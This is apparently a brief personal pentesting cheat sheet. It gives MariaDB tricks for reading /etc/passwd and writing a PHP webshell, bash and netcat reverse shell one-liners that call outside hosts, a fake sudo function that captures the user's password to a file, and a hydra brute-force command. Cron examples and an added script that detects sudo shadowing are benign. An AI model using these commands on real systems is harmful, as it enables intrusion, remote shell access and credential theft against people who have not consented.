some notes

Useful things

General

When our account has enough privileges in MariaDB (the FILE privilege), we can use the function load_file() to read files that we are interested in. Example: select load_file("/etc/passwd");

SELECT ... INTO OUTFILE writes a file. Example: select "<?php phpinfo() ?>" into outfile "/var/www/html/shell.php"; A webshell can be put in place of phpinfo().

Simple Bash Shell: bash -i >& /dev/tcp/1.2.3.4/4321 0>&1

Netcat Shell: nc 192.168.6.1 1234 -e /bin/bash

To steal the sudo password

function sudo () {
    realsudo="$(which sudo)"
    read -s -p "[sudo] password for $USER: " inputPasswd
    printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt
    $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1
    $realsudo "${@:1}"
}
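
Seen from the defending side, the wrapper above only takes effect if a `sudo` function or alias is defined in a startup file that the user's shell reads. The check below is an added example, not part of the original notes; the names scan_sudo_shadow, sudo_is_shadowed and SUDO_SHADOW_RE and the list of files in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example: find shell startup files that redefine `sudo` as a function
# or alias, and test how the running shell resolves `sudo`.
# All names below are made up for this example.

# Matches "function sudo", "sudo()" / "sudo ()" and "alias sudo=" at the start
# of a line. Commented-out lines and ordinary calls such as "sudo apt update"
# do not match.
SUDO_SHADOW_RE='^[[:space:]]*(function[[:space:]]+sudo([[:space:]]|\(|$)|sudo[[:space:]]*\([[:space:]]*\)|alias[[:space:]]+sudo=)'

# scan_sudo_shadow FILE...
# Prints "file:line:text" for every definition found.
# Returns 0 if at least one was found, 1 otherwise. Unreadable files are skipped.
scan_sudo_shadow() (
    status=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        if grep -nHE "$SUDO_SHADOW_RE" "$f"; then
            status=0
        fi
    done
    exit "$status"
)

# sudo_is_shadowed
# Returns 0 if the running shell resolves `sudo` to a function or an alias
# instead of a file on PATH, 1 otherwise (including when sudo is not installed).
sudo_is_shadowed() {
    resolved=$(command -V sudo 2>/dev/null || true)
    case "$resolved" in
        *function*|*alias*) return 0 ;;
        *) return 1 ;;
    esac
}

# Typical use, from the account being checked:
#   scan_sudo_shadow ~/.bashrc ~/.bash_profile ~/.profile /etc/profile /etc/bash.bashrc
#   sudo_is_shadowed && echo "sudo is not the binary: $(command -V sudo | head -n 1)"
```

A hit on `alias sudo='sudo '` is a common benign setting; any other definition deserves a look at what it runs.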

Cron time string

30 * * * *     Execute a command at 30 minutes past the hour, every hour.
0 13 * * 1     Execute a command at 1:00 p.m. UTC every Monday.
*/5 * * * *    Execute a command every five minutes.
0 */2 * * *    Execute a command every second hour, on the hour.

hydra

When we have a wordlist like:

admin:admin
admin:password
...

We have to use -C in hydra. Example: hydra -C wordlist.txt ftp://<vuln_ip>